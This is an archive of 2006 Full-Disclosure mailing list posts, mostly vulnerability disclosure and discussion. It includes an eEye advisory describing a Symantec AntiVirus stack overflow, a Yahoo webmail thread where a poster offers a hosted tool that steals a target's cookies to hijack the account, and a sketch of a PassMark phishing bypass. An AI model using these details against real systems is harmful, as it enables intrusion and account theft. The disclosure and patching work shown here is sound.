I'm getting port 21 connection attempts every 5 minutes from about half a dozen of my network users. These attempts are repeating regularly with one computer sending out 1500+ attempts a day. I have not seen this before and I'm wondering if anyone else here has seen a client behave this way before? My initial thoughts were: hacker, virus/trojan/spyware or badly configured program. I ruled hacker out right away when talking to the clients and realizing they didn't even understand the concept of ports. After receiving the machines from the clients and doing vigorous virus/trojan/spyware scans I have found nothing known on them. Anyone got anything? Is this something new or just new to me? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] repeated port 21 attempts
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Mon, Jun 12, 2006 at 04:30:40PM -0500, Jacob Wu wrote: I'm getting port 21 connection attempts every 5 minutes from about half a dozen of my network users. These attempts are repeating regularly with one computer sending out 1500+ attempts a day. I have not seen this before and I'm wondering if anyone else here has seen a client behave this way before? What is the target address ? - -- Rodrigo Barbosa Quid quid Latine dictum sit, altum viditur Be excellent to each other ... - Bill Ted (Wyld Stallyns) -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.1 (GNU/Linux) iD8DBQFEjeCApdyWzQ5b5ckRAoPzAJ4loHH0DksEflmRcbF2qI6lEfOYHgCePO7T Zmq7U+R7WVyVPalkhdlF7Vk= =FUjp -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] repeated port 21 attempts
Try websnarf: http://www.unixwiz.net/tools/websnarf-1.04 Set the port to 21 log some of the data they're sending. You can have it log the session to a file, too, I think. Note that the one line it grabs may not amount to much of anything, but it might give you some idea what the machines are trying to do. - Matt ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [EEYEB-20060524] Symantec Remote Management Stack Buffer Overflow
Symantec Remote Management Stack Buffer Overflow Release Date: June 12, 2006 Date Reported: May 24, 2006 Severity: High (Remote Code Execution) Systems Affected: Symantec AntiVirus 10.0.x for Windows (all versions) Symantec AntiVirus 10.1.x for Windows (all versions) Symantec Client Security 3.0.x for Windows (all versions) Symantec Client Security 3.1.x for Windows (all versions) Systems Not Affected: Symantec AntiVirus 10.x.x for Macintosh Symantec AntiVirus 10.x.x for Linux Symantec AntiVirus 10.x.x for Wireless Overview: eEye Digital Security has discovered a vulnerability in the remote management interface for Symantec AntiVirus 10.x and Symantec Client Security 3.x, which could be exploited by an anonymous attacker in order to execute arbitrary code with SYSTEM privileges on an affected system. The management interface is typically enabled in enterprise settings and listens on TCP port 2967 by default, for both server and client systems. Although remote management traffic is typically SSL-encrypted, managed systems will accept and process clear-text requests of the vulnerable type. Technical Details: The remote management protocol communicated by the affected products is a proprietary message-based protocol with two levels of encapsulation. The outer layer comprises a message header indicating one of three message types: 10, which designates a request to Rtvscan.exe, or 20 or 30, which mediate SSL negotiation. If SSL is established for a TCP connection, subsequent traffic is encrypted although the plaintext is still in the proprietary format. The data of type-10 messages contains its own header and body which are processed by Rtvscan.exe. This header features a command field which specifies the operation to perform and dictates the format of the body data. The COM_FORWARD_LOG (0x24) command handler contains an improper use of strncat that allows a 0x180-byte stack buffer to be overflowed with arbitrary data. If the first string in the COM_FORWARD_LOG request body contains a backslash, then one of the following two strncat calls will be performed: * If the string contains a comma but no double-quote: strncat(dest, src, 0x17A - strlen(src)); * Otherwise: strncat(dest, src, 0x17C - strlen(src)); If the length of the source string exceeds 0x17A or 0x17C characters respectively, the arithmetic will underflow and result in a very large copy size (since the copy size argument is of type size_t, which is unsigned). This causes the entire source string to be appended to the buffer, allowing the stack to be overwritten with up to 64KB of data in which only null characters are prohibited. Rtvscan.exe was compiled with the Visual Studio /GS security option which institutes stack canary checks, but this security measure can be bypassed by causing a very large overwrite and taking control of an exception handler registration. As a basic workaround against automated exploitation, the management interface TCP port may be changed via the HKEY_LOCAL_MACHINE\SOFTWARE\INTEL\LANDesk\VirusProtect6\CurrentVersion\ AgentIPPort registry value in order to accomplish a very slight amount of obfuscation. Remote management should continue to function even if the new port numbers are not homogeneous across an enterprise. Protection: Retina Network Security Scanner has been updated to identify this vulnerability. Blink - Endpoint Vulnerability Prevention - preemptively protects from this vulnerability. Vendor Status: Symantec has released patches for the affected products. For more information, please consult Symantec security advisory SYM06-010: http://www.symantec.com/avcenter/security/Content/2006.05.25.html Note that the installation of one or more previous patches may be required before the SYM06-010 patch can be applied. This issue has been assigned CVE-2006-2630. Credit: Derek Soeder Related Links: Retina Network Security Scanner - Free Trial (http://www.eeye.com/html/products/retina/index.html) Blink Endpoint Vulnerability Prevention - Free Trial (http://www.eeye.com/html/products/blink/index.html) Greetings: Symantec engineers, for very quickly producing a solid patch. Family and friends. Anti-greets to copperhead snakes. Copyright (c) 1998-2006 eEye Digital Security Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email [EMAIL PROTECTED] for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this
RE: [Full-disclosure] Vunerability in yahoo webmail.
-Original Message- On Behalf Of n3td3v Sent: Tuesday, June 13, 2006 4:05 AM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Vunerability in yahoo webmail. Yahoo is under the control of hackers. Good, Yahoo are a pathetic service anyway so it's no big deal, hey. $0.02 Sean. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Thanks for the feedback! GreenBorder License inside - with new options - valid to end of year
Hello List, Thank you all for the feedback I've received so far. Some of the feedback I'm receiving is that it might also serve as a malware analysis tool if we improve logging messages. In thanks to the list, and in the hope more security experts will stress test the software, here's an extended period license: D34OOW2267INS22JFDSOICKCCOE22EDX This is valid until the end of the year. This also adds a 'safe file' option - right-click on any executable or questionable file to open it in virtual space. Note: Many but not all programs will run in virtual space, support for Firefox, IM, and other networking programs is not official and have not been fully QA'd. Also, we've added more security by adding a firewall between virtual space and local network ports. The binary was updated late on Friday (6/9), and is available from here: http://www.greenborder.com/earlyaccess/ Bill Stout ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Winword crashes
I have no time to check it so there are details about the crash: Open in a browser the following location: http://ofertas.muchoviaje.com/viajes/ofertas/ofertapaquete.aspx?codigo=8491 Next, Select all (Ctrl+E) and try pasting it in Microsoft Word. It will always crash with a failure in MS09!GetSeletedLbx. May be something with the table's cells? _ Moda para esta temporada. Ponte al día de todas las tendencias. http://www.msn.es/Mujer/moda/default.asp ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZoneEdit.com Forcing Pop-Unders on WebForward-Configured Domains
Problem: DNS service ZoneEdit.com now owned by MyDomains.com has started forcing JavaScript pop-Unders onto users' browsers when the domain owner uses the ZoneEdit WebForward feature. References: www.zoneedit.com www.mydomains.com/support.php www.casalemedia.com/contact.html Details: Casale Media, Inc. is the Pop-Under Spammer responsible for paying My Domains cash money to distribute this crap to users. Example script shown below, embedded within the WebForward Cloaking frame. script language=JavaScript src=http://as.casalemedia.com/sd?s=65701f=1; Possible Resolutions: Stop using ZoneEdit for backup/failover or primary DNS service. Remove the economic incentive to lie, cheat and steal. Prosecute the offenders and send them to prison. Send/Fax your objections to ZoneEdit/MyDomains Correspondence or payment by check may be sent to our office at: ZoneEdit, Inc. 111 Broadway, 11th Floor New York, NY 10006 Fax:+1 (847) 461-1893 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Vunerability in yahoo webmail.
Title: Message Oh, I've CC'd [EMAIL PROTECTED], but if someone else would give them a proper write-up, and encourage them to close the hole, that'd be wonderful. Since yahoo isn't known for fixing bugs fast unless it's serious (and even then), here's something i wrote up today. The exploit is turned into a script-kiddish interface. Here's how it works: 1) you enter your email and the target (@yahoo.com) email 2) an email with the exploit is sent to the target 3) when the targetopens the mail for reading,cookies get stolen and you get a notification on the address specified 4) further instructions on how to log in are on the site. Testedon IExplore and Opera, works with both. http://zmailhost.ath.cx/ (I'm taking it down when yahoo fixes it or people abuse it too much) [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Vunerability in yahoo webmail.
Title: Message For the record: 30 minutes after I posted this, onLoad got changed to onfiltered - problem fixed by yahoo. :) -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of php0tSent: Tuesday, June 13, 2006 2:28 AMTo: full-disclosure@lists.grok.org.ukSubject: RE: [Full-disclosure] Vunerability in yahoo webmail. Oh, I've CC'd [EMAIL PROTECTED], but if someone else would give them a proper write-up, and encourage them to close the hole, that'd be wonderful. Since yahoo isn't known for fixing bugs fast unless it's serious (and even then), here's something i wrote up today. The exploit is turned into a script-kiddish interface. Here's how it works: 1) you enter your email and the target (@yahoo.com) email 2) an email with the exploit is sent to the target 3) when the targetopens the mail for reading,cookies get stolen and you get a notification on the address specified 4) further instructions on how to log in are on the site. Testedon IExplore and Opera, works with both. http://zmailhost.ath.cx/ (I'm taking it down when yahoo fixes it or people abuse it too much) [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vunerability in yahoo webmail.
Congratulations to the hackers running Yahoo!! On Tue, 13 Jun 2006 03:07:56 +0200 php0t [EMAIL PROTECTED] wrote: p Message p For the record: 30 minutes after I posted this, onLoad got changed to onfiltered - problem fixed by yahoo. :) p p p p -Original Message- p From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of php0t p Sent: Tuesday, June 13, 2006 2:28 AM p To: full-disclosure@lists.grok.org.uk p Subject: RE: [Full-disclosure] Vunerability in yahoo webmail. p p p Oh, I've CC'd [EMAIL PROTECTED], but if someone else would give them a proper write-up, and encourage p them to close the hole, that'd be wonderful. p p Since yahoo isn't known for fixing bugs fast unless it's serious (and even then), here's something i wrote up today. p The exploit is turned into a script-kiddish interface. Here's how it works: p 1) you enter your email and the target (@yahoo.com) email p 2) an email with the exploit is sent to the target p 3) when the target opens the mail for reading, cookies get stolen and you get a notification on the address specified p 4) further instructions on how to log in are on the site. p p Tested on IExplore and Opera, works with both. p p http://zmailhost.ath.cx/ p p (I'm taking it down when yahoo fixes it or people abuse it too much) p p [EMAIL PROTECTED] p p Allgemeinen Anschulterlaubnis Cardoso [EMAIL PROTECTED] - SkypeIn: (11) 3711-2466 / (41) 3941-5299 vida digital: http://www.contraditorium.com site pessoal e blog: http://www.carloscardoso.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Winword crashes
Hello putosoft, Tuesday, June 13, 2006, 12:56:56 AM, you wrote: I have no time to check it so there are details about the crash: Open in a browser the following location: http://ofertas.muchoviaje.com/viajes/ofertas/ofertapaquete.aspx?codigo=8491 Next, Select all (Ctrl+E) and try pasting it in Microsoft Word. It will always crash with a failure in MS09!GetSeletedLbx. Word 2003 (11.6359.6360) SP1 is not crashing. -- Best regards, hypermodestmailto:[EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PassMark?
-BEGIN PGP SIGNED MESSAGE- Hash: RIPEMD160 Gary E. Miller wrote: Yo All! I thought I'd actually risk a real security question here. Any one seen the PassMark (www.passmarksecurity.com) security system in action? Yes. Bank of Bangalore^H^H^H^H^H^H^H^H^HAmerica uses it, as well as a recent financial client corp. of mine. I'm not impressed with it. Randy -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFEjjYIRrGMQdCNGUERA5rnAJ94fz+ll9VzSazzp0zfhha8BwQURQCfYch0 o6/Swjo9ZIyc4Hsb7223koo= =s8LO -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PassMark?
I would agree as well, having recently reviewed them with others in the same field. Apart from relying on users to only enter their password if they saw an image, the solution heavily relied on cookie usage. This works fine for most people but a lot of corporate environments have persistant cookie polices so this ends up being an annoyance and ineffective for this segment of users. It also makes it susceptible to keystroke loggers due to the ease of which the challange can be generated. I'd also have trouble justifying this as anything other than a 2 x 1-factor solution and as such it may not meet FFIEC guidlines. The bigger issue, as with any other web based authentication solutions, is what does this protect you against and the answer these days is not a lot.Q-BallOn 6/13/06, Randal T. Rioux [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE-Hash: RIPEMD160Gary E. Miller wrote: Yo All! I thought I'd actually risk a real security question here. Any one seen the PassMark ( www.passmarksecurity.com) security system in action?Yes.Bank of Bangalore^H^H^H^H^H^H^H^H^HAmerica uses it, as well as a recentfinancial client corp. of mine. I'm not impressed with it.Randy-BEGIN PGP SIGNATURE-Version: GnuPG v1.4.2.2 (GNU/Linux)Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFEjjYIRrGMQdCNGUERA5rnAJ94fz+ll9VzSazzp0zfhha8BwQURQCfYch0o6/Swjo9ZIyc4Hsb7223koo==s8LO-END PGP SIGNATURE-___Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: FW: [Full-disclosure] PassMark?
I am not impressed with the PassMark solution. It would be trivial to setup a script of rotating images that are used by the passmark widget.. then feed them back to the user and have a script post stating the image that was on the screen when the user clicked submit.. Also feeding in any 2nd level password.. AND the next code that may change in 60 seconds.. It would just require the attacker to perform some parts of the attack manually rather than scripted..I'm mean-- the more hoops you have to jump through will make it harder to attack or replicate from a phishing view.. but also making it much more cumbersome on users. JPPacketFocusI have only spent a few minutes looking at the passmark demo.. so disregard if I'm way off :) -Original Message-From: Q-Ball [mailto:[EMAIL PROTECTED]] Sent: Tuesday, 13 June 2006 2:28 PMTo: Randal T. RiouxCc: full-disclosure@lists.grok.org.ukSubject: Re: [Full-disclosure] PassMark?I would agree as well, having recently reviewed them with others in the same field. Apart from relying on users to only enter their password if they saw an image, the solution heavily relied on cookie usage. This works fine for most people but a lot of corporate environments have persistant cookie polices so this ends up being an annoyance and ineffective for this segment of users. It also makes it susceptible to keystroke loggers due to the ease of which the challange can be generated. I'd also have trouble justifying this as anything other than a 2 x 1-factor solution and as such it may not meet FFIEC guidlines. The bigger issue, as with any other web based authentication solutions, is what does this protect you against and the answer these days is not a lot.Q-Ball On 6/13/06, Randal T. Rioux [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE-Hash: RIPEMD160Gary E. Miller wrote: Yo All! I thought I'd actually risk a real security question here. Any one seen the PassMark ( www.passmarksecurity.com ) security system in action?Yes.Bank of Bangalore^H^H^H^H^H^H^H^H^HAmerica uses it, as well as a recentfinancial client corp. of mine. I'm not impressed with it.Randy-BEGIN PGP SIGNATURE-Version: GnuPG v1.4.2.2 (GNU/Linux)Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFEjjYIRrGMQdCNGUERA5rnAJ94fz+ll9VzSazzp0zfhha8BwQURQCfYch0o6/Swjo9ZIyc4Hsb7223koo==s8LO-END PGP SIGNATURE-___Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSL VPNs and security
SSL VPNs have their legitimate place as does IPSec. Personally, I'd rather that travelling exec's who need to log on from a public Internet terminal, dont have full IP connectivity into the network, but maybe that's just me. Q-BallOn 6/10/06, Tim [EMAIL PROTECTED] wrote: That depends on whether the solution tries to solve single-sign-on problems as well.If the vendor is trying to handle SSO in such an environment, then they are probably using domain cookies.The problems are exactly the same as the ones Michal listed, plus some additional ones specific to domain cookies.Right, that does make it difficult.There's probably work arounds, butthey may be browser-specific.Wildcard cookies, cookies set to other origins, or somehow setting document.domain back to the base domainafter the initial page load might help, but some would probably presentthe same problem.The web was never designed for complex application development.At least, web standards aren't.Use a real VPN.cheers,tim___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1096-1] New webcalendar packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1096-1[EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze June 13th, 2006 http://www.debian.org/security/faq - -- Package: webcalendar Vulnerability : uninitialised variable Problem type : remote Debian-specific: no CVE ID : CVE-2006-2762 A vulnerability has been discovered in webcalendar, a PHP-based multi-user calendar, that allows a remote attacker to execute arbitrary PHP code when register_globals is turned on. The old stable distribution (woody) does not contain a webcalendar package. For the stable distribution (sarge) this problem has been fixed in version 0.9.45-4sarge5. For the unstable distribution (sid) this problem has been fixed in version 1.0.4-1 We recommend that you upgrade your webcalendar package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given at the end of this advisory: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge5.dsc Size/MD5 checksum: 608 216c1f9f764169fa877f1717f37dd73a http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge5.diff.gz Size/MD5 checksum:12569 3a996902a10791fe764548728885d812 http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45.orig.tar.gz Size/MD5 checksum: 612360 a6a66dc54cd293429b604fe6da7633a6 Architecture independent components: http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge5_all.deb Size/MD5 checksum: 629442 f918fe96d26d5cbfa99efe2b2e938d2f These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFEjk90W5ql+IAeqTIRArYKAKCJic+8h2YdllXcH8xtJPmj2xMyGwCglQXg owYhn8S6C9P4sO5vbiIh2/w= =Y3y5 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
